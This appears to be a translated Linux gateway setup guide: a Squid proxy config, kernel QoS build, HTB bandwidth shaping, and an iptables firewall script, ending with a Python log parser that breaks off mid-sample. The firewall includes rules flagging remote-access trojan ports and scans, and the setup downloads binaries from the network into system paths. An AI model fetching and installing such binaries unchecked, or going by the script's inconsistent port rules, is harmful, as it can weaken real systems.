cache_swap_low 90

cache_swap_high 95

cache_replacement_policy lru

cache_dir ufs /usr/local/squid/var/cache 1000 16 256

cache_access_log /usr/local/squid/var/logs/access.log

cache_log /usr/local/squid/var/logs/cache.log

cache_store_log none

mime_table /usr/local/squid/etc/mime.conf

pid_filename /usr/local/squid/var/logs/squid.pid

debug_options ALL,1

ftp_user Squid@

ftp_list_width 32

ftp_passive on

dns_nameservers 127.0.0.1

refresh_pattern ^ftp: 1440 20% 10080

refresh_pattern ^gopher: 1440 0% 1440

refresh_pattern . 0 20% 4320

acl all src 0.0.0.0/0.0.0.0

acl manager proto cache_object

acl localhost src 127.0.0.1/255.255.255.255

acl to_localhost dst 127.0.0.0/8

acl SSL_ports port 443 563 8443

acl Safe_ports port 80 # http

acl Safe_ports port 21 # ftp

acl Safe_ports port 443 563 # https, snews

acl Safe_ports port 70 # gopher

acl Safe_ports port 210 # wais

acl Safe_ports port 1025-65535 # unregistered ports

acl Safe_ports port 280 # http-mgmt

acl Safe_ports port 488 # gss-http

acl Safe_ports port 591 # filemaker

acl Safe_ports port 777 # multiling http

acl CONNECT method CONNECT

http_access allow manager localhost

http_access deny manager

http_access deny !Safe_ports

http_access deny CONNECT !SSL_ports

acl our_networks src 192.168.1.0/24

http_access allow our_networks

acl IIX dst_as 7713 4795 7597 4622 4787 4800

always_direct allow IIX

http_access deny all

cache_mgr webmaster

cache_effective_user squid

cache_effective_group squid

visible_hostname warnet.citra.com

httpd_accel_host virtual

httpd_accel_port 80

httpd_accel_with_proxy on

httpd_accel_uses_host_header on

################################

other configuration options can be read in squid.conf.default

Running squid for the first time:

groupadd -g 8080 squid

useradd -g 8080 -u 8080 -s /bin/false -d /usr/local/squid squid

checking the config for errors:

/usr/local/squid/sbin/squid -k parse

creating the cache directories:

/usr/local/squid/sbin/squid -z

Running squid:

/usr/local/squid/sbin/squid -DY

(also put this in rc.local)

Compiling the Kernel:

================

Compiling the kernel is done so the kernel can be optimized later on. Here we add the
QoS option for the bandwidth limiter facility. Make sure the ncurses package is installed

installpkg /mnt/cdrom/slackware/l/ncurse*.tgz

cd /usr/src/linux

make menuconfig

Networking options --->

QoS and/or fair queueing --->

[*] QoS and/or fair queueing
      CBQ packet scheduler
      HTB packet scheduler
      CSZ packet scheduler
      The simplest PRIO pseudoscheduler
      RED queue
      SFQ queue
      TEQL queue
      TBF queue
      GRED queue
      Diffserv field marker
      Ingress Qdisc
[*] QoS support
[*] Rate estimator
[*] Packet classifier API
      TC index classifier
      Routing table based classifier
      Firewall based classifier
      U32 classifier
      Special RSVP classifier
      Special RSVP classifier for IPv6
[*] Traffic policing (needed for in/egress)

exit and save the configuration above

make dep

make clean

make modules

make modules_install

make bzImage

Bootloader configuration

cp System.map /boot/System.map-qos

cp arch/i386/boot/bzImage /boot/vmlinuz-qos

pico /etc/lilo.conf

###########################

# Start LILO global section

boot = /dev/hda

message = /boot/boot_message.txt

prompt

timeout = 1200

# Override dangerous defaults that rewrite the partition table:

change-rules

reset

# Normal VGA console

vga = normal

# Linux bootable partition config begins

image = /boot/vmlinuz-qos

root = /dev/hda2

label = Linux-QOS

read-only

# Linux bootable partition config ends

# Linux bootable partition config begins

image = /boot/vmlinuz

root = /dev/hda2

label = Linux

read-only

# Linux bootable partition config ends

##############################

reboot

HTB Bandwidth Management

=======================

In this experiment there are 3 computers.

Total Internet bandwidth: 64 Kbps downlink, upstream unlimited

computer 1, named madya, with IP 192.168.1.2, will get a downlink share of 32 Kbps

computer 2, named dana, with IP 192.168.1.3, will get a downlink share of 16 Kbps

computer 3, named dion, with IP 192.168.1.4, will get a downlink share of 16 Kbps

download HTB.INIT

wget http://aleron.dl.sourceforge.net/sourceforge/htbinit/htb.init-v0.8.5

cp htb.init-v0.8.5 /usr/sbin/htb.init

chmod 755 /usr/sbin/htb.init

create the htb directory

mkdir -p /etc/sysconfig/htb

pico /etc/sysconfig/htb/eth0

R2Q=1

pico /etc/sysconfig/htb/eth0-10.root

RATE=64Kbit

QUANTUM=1500

pico /etc/sysconfig/htb/eth0-10:1.madya

RATE=32Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.2/32,

pico /etc/sysconfig/htb/eth0-10:2.dana

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.3/32,

pico /etc/sysconfig/htb/eth0-10:3.dion

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.4/32,

Install iproute2 from src.teras.net.id

installpkg http://src.teras.net.id/slack-pkg/iproute2-2.4.7_now_ss020116_try-i386-4.tgz

download the tc patch from docum.org

wget http://www.docum.org/docum.org/download/tc.bz2

extract tc and copy it to /sbin/

bunzip2 tc.bz2

cp tc /sbin/

chmod 755 /sbin/tc

Compile htb.init

htb.init compile

Start htb.init

htb.init start

If there are no errors, you have finished installing the htb bandwidth limiter; don't forget to put
htb.init start into rc.local

IPTABLES

========

#!/bin/sh

#################################################################################

# how to run the script: firewall (start|stop|restart|status) EXTIF INTIF

# example: "firewall start ppp0 eth0"

#################################################################################

IPTABLES="/usr/sbin/iptables"

case "$1" in

stop)

echo "firewall dimatikan..!!!"

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

$IPTABLES -P INPUT ACCEPT

$IPTABLES -P OUTPUT ACCEPT

$IPTABLES -P FORWARD ACCEPT

echo "...done"

;;

status)

echo $"Table: filter"

iptables --list

echo $"Table: nat"

iptables -t nat --list

echo $"Table: mangle"

iptables -t mangle --list

;;

restart|reload)

$0 stop

$0 start

;;

start)

echo "Benteng Firewall diaktifkan"

echo ""

DEFAULT_EXTIF="ppp0"

DEFAULT_INTIF="eth0"

UNIVERSE="0.0.0.0/0"

UNPRIVPORTS="1024:65535"

XWINPORTS="6000:6063"

IRCPORTS="6665,6666,6667,6668,6669,7000"

#-----Port-Forwarding Variables-----#

#For port-forwarding to an internal host, define a variable with the appropriate

#internal IP-Address here and take a look at the port-forwarding sections in the FORWARD +

#PREROUTING-chain:

#These are examples, uncomment to activate

#IP for forwarded Battlecom-traffic

#BATTLECOMIP="192.168.0.5"

#IP for forwarded HTTP-traffic

#HTTPIP="192.168.0.20"

#----Flood Variables-----#

# Overall Limit for TCP-SYN-Flood detection

TCPSYNLIMIT="5/s"

# Burst Limit for TCP-SYN-Flood detection

TCPSYNLIMITBURST="10"

# Overall Limit for Loggging in Logging-Chains

LOGLIMIT="2/s"

# Burst Limit for Logging in Logging-Chains

LOGLIMITBURST="10"

# Overall Limit for Ping-Flood-Detection

PINGLIMIT="5/s"

# Burst Limit for Ping-Flood-Detection

PINGLIMITBURST="10"

#----Automatically determine infos about involved interfaces-----#

### External Interface:

## Get external interface from command-line

## If no interface is specified then set $DEFAULT_EXTIF as EXTIF

if [ "x$2" != "x" ]; then

EXTIF=$2

else

EXTIF=$DEFAULT_EXTIF

fi

echo External Interface: $EXTIF

## Determine external IP

EXTIP="`ifconfig $EXTIF | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`"

if [ "$EXTIP" = '' ]; then

echo "Aborting: Unable to determine the IP-address of $EXTIF !"

exit 1

fi

echo External IP: $EXTIP

## Determine external gateway

EXTGW=`route -n | grep -A 4 UG | awk '{ print $2}'`

echo Default GW: $EXTGW

echo " --- "

### Internal Interface:

## Get internal interface from command-line

## If no interface is specified then set $DEFAULT_INTIF as INTIF

if [ "x$3" != "x" ]; then

INTIF=$3

else

INTIF=$DEFAULT_INTIF

fi

echo Internal Interface: $INTIF

## Determine internal IP

INTIP="`ifconfig $INTIF | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`"

if [ "$INTIP" = '' ]; then

echo "Aborting: Unable to determine the IP-address of $INTIF !"

exit 1

fi

echo Internal IP: $INTIP

## Determine internal netmask

INTMASK="`ifconfig $INTIF | grep Mask | cut -d : -f 4`"

echo Internal Netmask: $INTMASK

## Determine network address of the internal network

INTLAN=$INTIP'/'$INTMASK

echo Internal LAN: $INTLAN

echo ""

#----Load IPTABLES-modules-----#

#Insert modules- should be done automatically if needed

#If the IRC-modules are available, uncomment them below

echo "Loading IPTABLES modules"

dmesg -n 1 #Kill copyright display on module load

/sbin/modprobe ip_tables

/sbin/modprobe iptable_filter

/sbin/modprobe ip_conntrack

/sbin/modprobe ip_conntrack_ftp

/sbin/modprobe ip_nat_ftp

#/sbin/modprobe ip_conntrack_irc ports=$IRCPORTS

#/sbin/modprobe ip_nat_irc ports=$IRCPORTS

dmesg -n 6

echo " --- "

#----Clear/Reset all chains-----#

#Clear all IPTABLES-chains

#Flush everything, start from scratch

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

#Set default policies to DROP

$IPTABLES -P INPUT DROP

$IPTABLES -P OUTPUT DROP

$IPTABLES -P FORWARD DROP

#----Set network sysctl options-----#

echo "Setting sysctl options"

#Enable forwarding in kernel

echo 1 > /proc/sys/net/ipv4/ip_forward

#Disabling IP Spoofing attacks.

echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter

#Don't respond to broadcast pings (Smurf-Amplifier-Protection)

echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Block source routing

echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route

#Kill timestamps

echo 0 > /proc/sys/net/ipv4/tcp_timestamps

#Enable SYN Cookies

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

#Kill redirects

echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

#Enable bad error message protection

echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#Log martians (packets with impossible addresses)

echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

#Set our local port range

echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range

#Reduce DoS'ing ability by reducing timeouts

echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout

echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time

echo 0 > /proc/sys/net/ipv4/tcp_window_scaling

echo 0 > /proc/sys/net/ipv4/tcp_sack

echo " --- "

echo "Creating user-chains"

#----Create logging chains-----#

##These are the logging-chains. They all have a certain limit of log-entries/sec to prevent logflooding

##The syslog-entries will be fireparse-compatible (see http://www.fireparse.com)

#Invalid packets (not ESTABLISHED,RELATED or NEW)

$IPTABLES -N LINVALID

$IPTABLES -A LINVALID -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=INVALID:1 a=DROP "

$IPTABLES -A LINVALID -j DROP

#TCP-Packets with one or more bad flags

$IPTABLES -N LBADFLAG

$IPTABLES -A LBADFLAG -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=BADFLAG:1 a=DROP "

$IPTABLES -A LBADFLAG -j DROP

#Logging of connection attempts on special ports (Trojan portscans, special services, etc.)

$IPTABLES -N LSPECIALPORT

$IPTABLES -A LSPECIALPORT -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=SPECIALPORT:1 a=DROP "

$IPTABLES -A LSPECIALPORT -j DROP

#Logging of possible TCP-SYN-Floods

$IPTABLES -N LSYNFLOOD

$IPTABLES -A LSYNFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=SYNFLOOD:1 a=DROP "

$IPTABLES -A LSYNFLOOD -j DROP

#Logging of possible Ping-Floods

$IPTABLES -N LPINGFLOOD

$IPTABLES -A LPINGFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=PINGFLOOD:1 a=DROP "

$IPTABLES -A LPINGFLOOD -j DROP

#All other dropped packets

$IPTABLES -N LDROP

$IPTABLES -A LDROP -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=TCP:1 a=DROP "

$IPTABLES -A LDROP -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=UDP:2 a=DROP "

$IPTABLES -A LDROP -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=ICMP:3 a=DROP "

$IPTABLES -A LDROP -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=FRAGMENT:4 a=DROP "

$IPTABLES -A LDROP -j DROP

#All other rejected packets

$IPTABLES -N LREJECT

$IPTABLES -A LREJECT -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=TCP:1 a=REJECT "

$IPTABLES -A LREJECT -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=UDP:2 a=REJECT "

$IPTABLES -A LREJECT -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=ICMP:3 a=REJECT "

$IPTABLES -A LREJECT -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=FRAGMENT:4 a=REJECT "

$IPTABLES -A LREJECT -p tcp -j REJECT --reject-with tcp-reset

$IPTABLES -A LREJECT -p udp -j REJECT --reject-with icmp-port-unreachable

$IPTABLES -A LREJECT -j REJECT

#----Create Accept-Chains-----#

#TCPACCEPT - Check for SYN-Floods before letting TCP-Packets in

$IPTABLES -N TCPACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -m limit --limit $TCPSYNLIMIT --limit-burst $TCPSYNLIMITBURST -j ACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -j LSYNFLOOD

$IPTABLES -A TCPACCEPT -p tcp ! --syn -j ACCEPT

#----Create special User-Chains-----#

#CHECKBADFLAG - Kill any Inbound/Outbound TCP-Packets with impossible flag-combinations (some port-scanners use these, e.g. nmap Xmas, Null, etc. scans)

$IPTABLES -N CHECKBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL FIN,URG,PSH -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL ALL -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL NONE -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,RST SYN,RST -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,FIN SYN,FIN -j LBADFLAG

#FILTERING FOR SPECIAL PORTS

#Inbound/Outbound SILENTDROPS/REJECTS (Things we don't want in our Logs)

#SMB-Traffic

$IPTABLES -N SMB

$IPTABLES -A SMB -p tcp --dport 137 -j DROP

$IPTABLES -A SMB -p tcp --dport 138 -j DROP

$IPTABLES -A SMB -p tcp --dport 139 -j DROP

$IPTABLES -A SMB -p tcp --dport 445 -j DROP

$IPTABLES -A SMB -p udp --dport 137 -j DROP

$IPTABLES -A SMB -p udp --dport 138 -j DROP

$IPTABLES -A SMB -p udp --dport 139 -j DROP

$IPTABLES -A SMB -p udp --dport 445 -j DROP

$IPTABLES -A SMB -p tcp --sport 137 -j DROP

$IPTABLES -A SMB -p tcp --sport 138 -j DROP

$IPTABLES -A SMB -p tcp --sport 139 -j DROP

$IPTABLES -A SMB -p tcp --sport 445 -j DROP

$IPTABLES -A SMB -p udp --sport 137 -j DROP

$IPTABLES -A SMB -p udp --sport 138 -j DROP

$IPTABLES -A SMB -p udp --sport 139 -j DROP

$IPTABLES -A SMB -p udp --sport 445 -j DROP

#Inbound Special Ports

$IPTABLES -N SPECIALPORTS

#Deepthroat Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 6670 -j LSPECIALPORT

#Subseven Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 6711:6713 -j LSPECIALPORT

#Netbus Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 12345:12346 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 20034 -j LSPECIALPORT

#Back Orifice scan

$IPTABLES -A SPECIALPORTS -p udp --dport 31337:31338 -j LSPECIALPORT

#X-Win

$IPTABLES -A SPECIALPORTS -p tcp --dport $XWINPORTS -j LSPECIALPORT

#Hack'a'Tack 2000

$IPTABLES -A SPECIALPORTS -p udp --dport 28431 -j LSPECIALPORT

#ICMP/TRACEROUTE FILTERING

#Inbound ICMP/Traceroute

$IPTABLES -N ICMPINBOUND

#Ping Flood protection. Accept $PINGLIMIT echo-requests/sec, rest will be logged/dropped

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -m limit --limit $PINGLIMIT --limit-burst $PINGLIMITBURST -j ACCEPT

#

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -j LPINGFLOOD

#Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-Timestamp (Should already be caught by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-reply -j LDROP

#Allow all other ICMP in

$IPTABLES -A ICMPINBOUND -p icmp -j ACCEPT

#Outbound ICMP/Traceroute

$IPTABLES -N ICMPOUTBOUND

#Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-TTL-Expired

#MS Traceroute (MS uses ICMP instead of UDP for tracert)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-transit -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-reassembly -j LDROP

#Block ICMP-Parameter-Problem

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type parameter-problem -j LDROP

#Block ICMP-Timestamp (Should already be caught by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-reply -j LDROP

##Accept all other ICMP going out

$IPTABLES -A ICMPOUTBOUND -p icmp -j ACCEPT

#----End User-Chains-----#

echo " --- "

#----Start Ruleset-----#

echo "Implementing firewall rules..."

#################

## INPUT-Chain ## (everything that is addressed to the firewall itself)

#################

##GENERAL Filtering

# Kill INVALID packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A INPUT -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A INPUT -p tcp -j CHECKBADFLAG

##Packets FROM FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A INPUT -i lo -j ACCEPT

#

#Kill connections to the local interface from the outside world (--> Should already be caught by kernel/rp_filter)

$IPTABLES -A INPUT -d 127.0.0.0/8 -j LREJECT

##Packets FROM INTERNAL NET

##Allow unlimited traffic from internal network using legit addresses to firewall-box

##If protection from the internal interface is needed, alter it

$IPTABLES -A INPUT -i $INTIF -s $INTLAN -j ACCEPT

#Kill anything from outside claiming to be from internal network (Address-Spoofing --> Should already be caught by rp_filter)

$IPTABLES -A INPUT -s $INTLAN -j LREJECT

##Packets FROM EXTERNAL NET

##ICMP & Traceroute filtering

#Filter ICMP

$IPTABLES -A INPUT -i $EXTIF -p icmp -j ICMPINBOUND

#Block UDP-Traceroute

$IPTABLES -A INPUT -p udp --dport 33434:33523 -j LDROP

##Silent Drops/Rejects (Things we don't want in our logs)

#Drop all SMB-Traffic

$IPTABLES -A INPUT -i $EXTIF -j SMB

#Silently reject Ident (Don't DROP ident, because of possible delays when establishing an outbound connection)

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 20 -j TCPACCEPT

# ftp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 21 -j TCPACCEPT

# ssh

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 22 -j TCPACCEPT

#telnet

#$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 23 -j TCPACCEPT

# smtp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 25 -j TCPACCEPT

# DNS

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 53 -j TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport 53 -j ACCEPT

# http

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 80 -j TCPACCEPT

# https

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 443 -j TCPACCEPT

# POP-3

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 110 -j TCPACCEPT

#SQUID

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 3128 -j TCPACCEPT

$IPTABLES -t nat -A PREROUTING -i $EXTIF -p tcp --dport 80 -j REDIRECT --to-port 3128

##Separate logging of special portscans/connection attempts

$IPTABLES -A INPUT -i $EXTIF -j SPECIALPORTS

##Allow ESTABLISHED/RELATED connections in

$IPTABLES -A INPUT -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j ACCEPT

##Catch all rule

$IPTABLES -A INPUT -j LDROP

##################

## Output-Chain ## (everything that comes directly from the Firewall-Box)

##################

##Packets TO FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A OUTPUT -o lo -j ACCEPT

##Packets TO INTERNAL NET

#Allow unlimited traffic to internal network using legit addresses

$IPTABLES -A OUTPUT -o $INTIF -d $INTLAN -j ACCEPT

##Packets TO EXTERNAL NET

##ICMP & Traceroute

$IPTABLES -A OUTPUT -o $EXTIF -p icmp -j ICMPOUTBOUND

##Silent Drops/Rejects (Things we don't want in our logs)

#SMB

$IPTABLES -A OUTPUT -o $EXTIF -j SMB

#Ident

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 20 -j ACCEPT

# ftp

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 21 -j ACCEPT

# ssh

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

#telnet

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 23 -m state --state ESTABLISHED -j ACCEPT

# smtp

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT

# DNS

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 53 -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -p udp --sport 53 -j ACCEPT

# http

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

# https

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

# POP-3

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT

# Squid

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 3128 -m state --state ESTABLISHED -j ACCEPT

##Accept all tcp/udp traffic on unprivileged ports going out

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p tcp --sport $UNPRIVPORTS -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p udp --sport $UNPRIVPORTS -j ACCEPT

##Catch all rule

$IPTABLES -A OUTPUT -j LDROP

####################

## FORWARD-Chain ## (everything that passes the firewall)

####################

##GENERAL Filtering

#Kill invalid packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A FORWARD -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A FORWARD -p tcp -j CHECKBADFLAG

##Filtering FROM INTERNAL NET

##Silent Drops/Rejects (Things we don't want in our logs)

#SMB

$IPTABLES -A FORWARD -o $EXTIF -j SMB

##Special Drops/Rejects

# - To be done -

##Filter for some Trojans communicating to outside

# - To be done -

##Port-Forwarding from Ports < 1024 [outbound] (--> Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -o $EXTIF -s $HTTPIP -p tcp --sport 80 -j ACCEPT

##Allow all other forwarding (from Ports > 1024) from Internal Net to External Net

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p tcp --sport $UNPRIVPORTS -j ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p udp --sport $UNPRIVPORTS -j ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p icmp -j ACCEPT

##Filtering FROM EXTERNAL NET

##Silent Drops/Rejects (Things we don't want in our logs)

#SMB

$IPTABLES -A FORWARD -i $EXTIF -j SMB

##Allow replies coming in

$IPTABLES -A FORWARD -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j TCPACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p icmp -m state --state RELATED -j ACCEPT

##Port-Forwarding [inbound] (--> Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -i $EXTIF -p tcp -d $HTTPIP --dport 80 -j ACCEPT

#Battlecom-Forwarding

#$IPTABLES -A FORWARD -p tcp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p udp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p tcp --dport 47624 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

##Catch all rule/Deny every other forwarding

$IPTABLES -A FORWARD -j LDROP

################

## PREROUTING ##

################

##Port-Forwarding (--> Also see chain FORWARD)

##HTTP

#$IPTABLES -A PREROUTING -t nat -i $EXTIF -p tcp -d $EXTIP --dport 80 -j DNAT --to $HTTPIP

##Battlecom

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 2300:2400 -i $EXTIF -j DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p udp --destination-port 2300:2400 -i $EXTIF -j DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 47624 -i $EXTIF -j DNAT --to $BATTLECOMIP:47624

###################

## POSTROUTING ##

###################

#Masquerade from Internal Net to External Net

$IPTABLES -A POSTROUTING -t nat -o $EXTIF -j MASQUERADE

#------End Ruleset------#

echo "...done"

echo ""

echo "--> IPTABLES firewall loaded/activated <--"

##--------------------------------End Firewall---------------------------------##

;;

*)

echo "Usage: firewall (start|stop|restart|status) EXTIF INTIF"

exit 1

esac

exit 0
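The logging chains in the script above stamp every LOG entry with a fireparse-style prefix (fp=<CLASS>:<ID> a=<ACTION>). The parser and summary below are added here as an example and are not part of the original script: they read such syslog lines, count hits per class and per source, and flag sources that repeatedly trip the scan/flood chains. The log lines are constructed samples in the shape of netfilter's LOG output, not real traffic.

```python
"""Parse and summarise the fp=<CLASS>:<ID> a=<ACTION> prefixes written by the
firewall script's logging chains (LINVALID, LBADFLAG, LSYNFLOOD, ...).
Added example; SAMPLE_LOG is constructed, not captured from a real host."""
import re
from collections import Counter

# The fixed prefix the LOG rules add, e.g. "fp=BADFLAG:1 a=DROP ".
PREFIX_RE = re.compile(r"fp=(?P<cls>[A-Z]+):(?P<id>\d+) a=(?P<action>DROP|REJECT)")
# The kernel's own KEY=VALUE fields that follow the prefix (IN=, SRC=, DPT=, ...).
FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")

# Chains that indicate scanning or flooding rather than ordinary noise.
SCAN_CLASSES = {"BADFLAG", "SYNFLOOD", "SPECIALPORT", "PINGFLOOD"}

# Constructed syslog lines; addresses are documentation ranges.
SAMPLE_LOG = """\
Oct 29 10:15:32 fw kernel: fp=BADFLAG:1 a=DROP IN=eth0 OUT= SRC=203.0.113.5 DST=198.51.100.1 LEN=40 TTL=52 PROTO=TCP SPT=54321 DPT=22 FIN PSH URG
Oct 29 10:15:33 fw kernel: fp=SYNFLOOD:1 a=DROP IN=eth0 OUT= SRC=203.0.113.5 DST=198.51.100.1 LEN=60 TTL=52 PROTO=TCP SPT=40000 DPT=80 SYN
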